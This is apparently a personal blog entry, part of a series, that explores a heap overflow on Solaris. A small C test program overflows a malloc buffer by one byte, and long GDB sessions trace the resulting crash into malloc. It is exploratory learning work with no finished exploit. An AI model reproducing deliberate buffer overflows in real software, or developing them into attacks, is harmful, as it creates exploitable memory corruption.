Uncovering ‘W(1)’ Heap Overflow Exploit — Pt 7
Messing with programs I learned that there is a 8-byte window after the buffer, where the first 4 actually “say” something.. Don’t know what yet.. but all it takes is that first byte to be overwritten AND a subsequent call to malloc() to cause a segmentation fault of some sort.. No calls to free() necessary.. What is happening?!? I need to learn about the SVR4 malloc implementation and GDB sessions to find out :D
bazz@blade72[pts/1][/tmp] vi d.c
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
11 memset(p, 'A',800);
12
13
14 func();
15 }
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
~
"d.c" 15L, 171C written
bazz@blade72[pts/1][/tmp] gcc -g d.c
bazz@blade72[pts/1][/tmp] gdb a.out
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) list func
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
(gdb)
11 memset(p, 'A',800);
12
13
14 func();
15 }
(gdb) b 12
Breakpoint 1 at 0x1076c: file d.c, line 12.
(gdb) b 5
Breakpoint 2 at 0x10724: file d.c, line 5.
(gdb) r
Starting program: /tmp/a.out
Breakpoint 1, main (argc=1, argv=0xffbef05c) at d.c:14
14 func();
(gdb) p/x p
$1 = 0x209f8
(gdb) x/96x p
0x209f8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a68: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20aa8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ab8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ac8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ad8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ae8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20af8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b68: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20b78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ba8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bc8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bd8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20be8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bf8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c18: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c28: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c38: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c48: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c58: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c68: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c78: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c88: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c98: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ca8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cb8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cc8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cd8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ce8: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20cf8: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d08: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d18: 0x00001cc8 0x00000000 0x00000000 0x00000000
0x20d28: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d38: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d48: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d68: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d78: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d88: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d98: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df8: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e08: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e18: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e28: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e38: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e48: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e68: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:5
5 getchar();
(gdb) p/x penis
$2 = 0x20d20
(gdb) x/96x penis
0x20d20: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d30: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d40: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d50: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d60: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d70: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d80: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d90: 0x42424242 0x42424242 0x42424242 0x42424242
0x20da0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20db0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dc0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dd0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20de0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20df0: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e00: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e10: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e20: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e30: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e40: 0x42424242 0x42424242 0x42424242 0x00000000
0x20e50: 0x00001b90 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) x/96x penis-8
0x20d18: 0x00000131 0x00000000 0x42424242 0x42424242
0x20d28: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d38: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d48: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d58: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d68: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d78: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d88: 0x42424242 0x42424242 0x42424242 0x42424242
0x20d98: 0x42424242 0x42424242 0x42424242 0x42424242
0x20da8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20db8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dc8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20dd8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20de8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20df8: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e08: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e18: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e28: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e38: 0x42424242 0x42424242 0x42424242 0x42424242
0x20e48: 0x42424242 0x00000000 0x00001b90 0x00000000
0x20e58: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e68: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e78: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e88: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
Major GDB learning session
I will need the malloc source code..
bazz@blade72[pts/1][/tmp] ./a.out 800
bazz@blade72[pts/1][/tmp] ./a.out 801
Segmentation Fault (core dumped)
bazz@blade72[pts/1][/tmp] gdb a.out
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) r 801
Starting program: /tmp/a.out 801
Program received signal SIGSEGV, Segmentation fault.
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) backtrace
#0 0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
#1 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#2 0x0001072c in func () at d.c:3
#3 0x000107b4 in main (argc=2, argv=0xffbef054) at d.c:14
(gdb) list func
1 func()
2 {
3 char *penis = malloc(300);
4 memset(penis,'B',300);
5 getchar();
6 }
7 main (int argc, char **argv)
8 {
9 char *p = malloc(800);
10
(gdb)
11 memset(p, 'A',atoi(argv[1]));
12
13
14 func();
15 }
(gdb) b 12
Breakpoint 1 at 0x107ac: file d.c, line 12.
(gdb) b 3
Breakpoint 2 at 0x10720: file d.c, line 3.
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y^CStarting program: /tmp/a.out 801
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) Quit
(gdb) r 801
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out 801
Breakpoint 1, main (argc=2, argv=0xffbef054) at d.c:14
14 func();
(gdb) x/96x p
0x20a40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20a90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20aa0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ab0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ac0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ad0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ae0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20af0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b30: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20b90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ba0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bb0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20bc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20be0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20bf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c30: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c60: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c70: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c80: 0x41414141 0x41414141 0x41414141 0x41414141
0x20c90: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ca0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cb0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cc0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cd0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20ce0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20cf0: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d00: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d10: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d20: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d30: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0x20d40: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d50: 0x41414141 0x41414141 0x41414141 0x41414141
0x20d60: 0x41001cc8 0x00000000 0x00000000 0x00000000
0x20d70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20d90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20da0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20db0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dc0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20dd0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20de0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20df0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e00: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e10: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e20: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e30: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e40: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e50: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e60: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e70: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e80: 0x00000000 0x00000000 0x00000000 0x00000000
0x20e90: 0x00000000 0x00000000 0x00000000 0x00000000
0x20ea0: 0x00000000 0x00000000 0x00000000 0x00000000
0x20eb0: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb) c
Continuing.
Breakpoint 2, func () at d.c:3
3 char *penis = malloc(300);
(gdb) si
0x00010724 3 char *penis = malloc(300);
(gdb) x/10i $pc
0x10724 <func+8>: call 0x208f4 <malloc>
0x10728 <func+12>: nop
0x1072c <func+16>: mov %o0, %g1
0x10730 <func+20>: st %g1, [ %fp + -20 ]
0x10734 <func+24>: ld [ %fp + -20 ], %o0
0x10738 <func+28>: mov 0x42, %o1
0x1073c <func+32>: mov 0x12c, %o2
0x10740 <func+36>: call 0x20900 <memset>
0x10744 <func+40>: nop
0x10748 <func+44>: call 0x2090c <getchar>
(gdb) si
0x00010728 3 char *penis = malloc(300);
(gdb) x/10i $pc
0x10728 <func+12>: nop
0x1072c <func+16>: mov %o0, %g1
0x10730 <func+20>: st %g1, [ %fp + -20 ]
0x10734 <func+24>: ld [ %fp + -20 ], %o0
0x10738 <func+28>: mov 0x42, %o1
0x1073c <func+32>: mov 0x12c, %o2
0x10740 <func+36>: call 0x20900 <memset>
0x10744 <func+40>: nop
0x10748 <func+44>: call 0x2090c <getchar>
0x1074c <func+48>: nop
(gdb) si
0x000208f4 in malloc ()
(gdb) x/10i $pc
0x208f4 <malloc>: sethi %hi(0x1e000), %g1
0x208f8 <malloc+4>: sethi %hi(0xff2c1c00), %g1
0x208fc <malloc+8>: jmp %g1 + 0x188 ! 0xff2c1d88 <malloc>
0x20900 <memset>: sethi %hi(0x21000), %g1
0x20904 <memset+4>: sethi %hi(0xff381800), %g1
0x20908 <memset+8>: jmp %g1 + 0x70 ! 0xff381870 <memset>
0x2090c <getchar>: sethi %hi(0x24000), %g1
0x20910 <getchar+4>: b,a 0x2087c <_PROCEDURE_LINKAGE_TABLE_>
0x20914 <getchar+8>: nop
0x20918 <atoi>: sethi %hi(0x27000), %g1
(gdb) i r
g0 0x0 0
g1 0x41414141 1094795585
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x12c 300
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeef00 4290703104
o7 0x10724 67364
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x20a40 133696
i1 0x41414141 1094795585
i2 0x0 0
i3 0xffffffc0 -64
i4 0xfffffff8 -8
i5 0x20d61 134497
fp 0xffbeef78 4290703224
i7 0x107ac 67500
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400004 -29360124 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:4
wim 0x0 0
tbr 0x0 0
pc 0x208f4 133364
npc 0x208f8 133368
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0x000208f8 in malloc ()
(gdb) i r
g0 0x0 0
g1 0x1e000 122880
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x12c 300
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeef00 4290703104
o7 0x10724 67364
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x20a40 133696
i1 0x41414141 1094795585
i2 0x0 0
i3 0xffffffc0 -64
i4 0xfffffff8 -8
i5 0x20d61 134497
fp 0xffbeef78 4290703224
i7 0x107ac 67500
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400006 -29360122 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:6
wim 0x0 0
tbr 0x0 0
pc 0x208f8 133368
npc 0x208fc 133372
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0x208f8 <malloc+4>: sethi %hi(0xff2c1c00), %g1
0x208fc <malloc+8>: jmp %g1 + 0x188 ! 0xff2c1d88 <malloc>
0x20900 <memset>: sethi %hi(0x21000), %g1
0x20904 <memset+4>: sethi %hi(0xff381800), %g1
0x20908 <memset+8>: jmp %g1 + 0x70 ! 0xff381870 <memset>
0x2090c <getchar>: sethi %hi(0x24000), %g1
0x20910 <getchar+4>: b,a 0x2087c <_PROCEDURE_LINKAGE_TABLE_>
0x20914 <getchar+8>: nop
0x20918 <atoi>: sethi %hi(0x27000), %g1
0x2091c <atoi+4>: sethi %hi(0xff2b5c00), %g1
(gdb) p/x malloc
$1 = Value can't be converted to integer.
(gdb) disas malloc
Dump of assembler code for function malloc:
0xff2c1d88 <malloc>: save %sp, -96, %sp
0xff2c1d8c <malloc+4>: call 0xff2c1d94 <malloc+12>
0xff2c1d90 <malloc+8>: sethi %hi(0x7a000), %o1
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
0xff2c1db8 <malloc+48>: mov %l0, %o0
0xff2c1dbc <malloc+52>: ret
0xff2c1dc0 <malloc+56>: restore
End of assembler dump.
(gdb) b malloc
Breakpoint 3 at 0xff2c1d8c
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1d8c in malloc () from /usr/lib/libc.so.1
(gdb) si
0xff2c1d90 in malloc () from /usr/lib/libc.so.1
(gdb)
0xff2c1d94 in malloc () from /usr/lib/libc.so.1
(gdb) i r
g0 0x0 0
g1 0x21000 135168
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x7a000 499712
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeeea0 4290703008
o7 0xff2c1d8c -13886068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbeef00 4290703104
i7 0x10724 67364
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c1d94 4281081236
npc 0xff2c1d98 -13886056
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
0xff2c1db8 <malloc+48>: mov %l0, %o0
(gdb) i r
g0 0x0 0
g1 0x21000 135168
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x7a000 499712
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeeea0 4290703008
o7 0xff2c1d8c -13886068
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x0 0
i2 0x0 0
i3 0x0 0
i4 0x0 0
i5 0x0 0
fp 0xffbeef00 4290703104
i7 0x10724 67364
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400002 -29360126 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:2
wim 0x0 0
tbr 0x0 0
pc 0xff2c1d94 4281081236
npc 0xff2c1d98 -13886056
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) x/10i $pc
0xff2c1d94 <malloc+12>: add %o1, 0x27c, %o1 ! 0x7a27c
0xff2c1d98 <malloc+16>: add %o1, %o7, %o3
0xff2c1d9c <malloc+20>: ld [ %o3 + 0xecc ], %l0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
0xff2c1da4 <malloc+28>: mov %l0, %o0
0xff2c1da8 <malloc+32>: call 0xff2c1dc4 <_malloc_unlocked>
0xff2c1dac <malloc+36>: mov %i0, %o0
0xff2c1db0 <malloc+40>: mov %o0, %i0
0xff2c1db4 <malloc+44>: call 0xff33d050 <_PROCEDURE_LINKAGE_TABLE_+72>
0xff2c1db8 <malloc+48>: mov %l0, %o0
(gdb) b _malloc_unlocked
Breakpoint 4 at 0xff2c1dc8
(gdb) c
Continuing.
Breakpoint 4, 0xff2c1dc8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1dc8 <_malloc_unlocked+4>: sethi %hi(0xffffdc00), %o0
0xff2c1dcc <_malloc_unlocked+8>: call 0xff2c1dd4 <_malloc_unlocked+16>
0xff2c1dd0 <_malloc_unlocked+12>: sethi %hi(0x7a000), %o1
0xff2c1dd4 <_malloc_unlocked+16>: add %o0, 0x3e7, %o0
0xff2c1dd8 <_malloc_unlocked+20>: cmp %i0, %o0
0xff2c1ddc <_malloc_unlocked+24>: add %o1, 0x23c, %o1
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0x0 0
o1 0x0 0
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0x0 0
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0x0 0
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe400003 -29360125 icc:-Z--, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1dc8 4281081288
npc 0xff2c1dcc -13886004
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
cpsr 0x0 0
(gdb) si
0xff2c1dcc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1dd8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1ddc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1de0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/10i $pc
0xff2c1de0 <_malloc_unlocked+28>: bleu 0xff2c1e00 <_malloc_unlocked+60>
0xff2c1de4 <_malloc_unlocked+32>: add %o1, %o7, %i2
0xff2c1de8 <_malloc_unlocked+36>: call 0xff33d068 <_PROCEDURE_LINKAGE_TABLE_+96>
0xff2c1dec <_malloc_unlocked+40>: nop
0xff2c1df0 <_malloc_unlocked+44>: mov 0xc, %o1 ! 0xc
0xff2c1df4 <_malloc_unlocked+48>: st %o1, [ %o0 ]
0xff2c1df8 <_malloc_unlocked+52>: ret
0xff2c1dfc <_malloc_unlocked+56>: restore %g0, 0, %o0
0xff2c1e00 <_malloc_unlocked+60>: ld [ %i2 + 0x4a4 ], %o1
0xff2c1e04 <_malloc_unlocked+64>: andcc %i0, 7, %o0
(gdb) i r
g0 0x0 0
g1 0xff31a028 -13524952
g2 0x0 0
g3 0x0 0
g4 0x0 0
g5 0x0 0
g6 0x0 0
g7 0x0 0
o0 0xffffdfe7 -8217
o1 0x7a23c 500284
o2 0x0 0
o3 0x0 0
o4 0x0 0
o5 0x0 0
sp 0xffbeee40 4290702912
o7 0xff2c1dcc -13886004
l0 0x0 0
l1 0x0 0
l2 0x0 0
l3 0x0 0
l4 0x0 0
l5 0x0 0
l6 0x0 0
l7 0x0 0
i0 0x12c 300
i1 0x7a27c 500348
i2 0x0 0
i3 0xff33c008 -13385720
i4 0x21eec 138988
i5 0xff2c1da0 -13886048
fp 0xffbeeea0 4290703008
i7 0xff2c1da8 -13886040
y 0x0 0
---Type <return> to continue, or q <return> to quit---
psr 0xfe100003 -32505853 icc:---C, pil:0, s:0, ps:0, et:0, cwp:3
wim 0x0 0
tbr 0x0 0
pc 0xff2c1de0 4281081312
npc 0xff2c1de4 -13885980
fpsr 0x0 0 rd:N, tem:0, ns:0, ver:0, ftt:0, qne:0, fcc:=, aexc:0, cexc:0
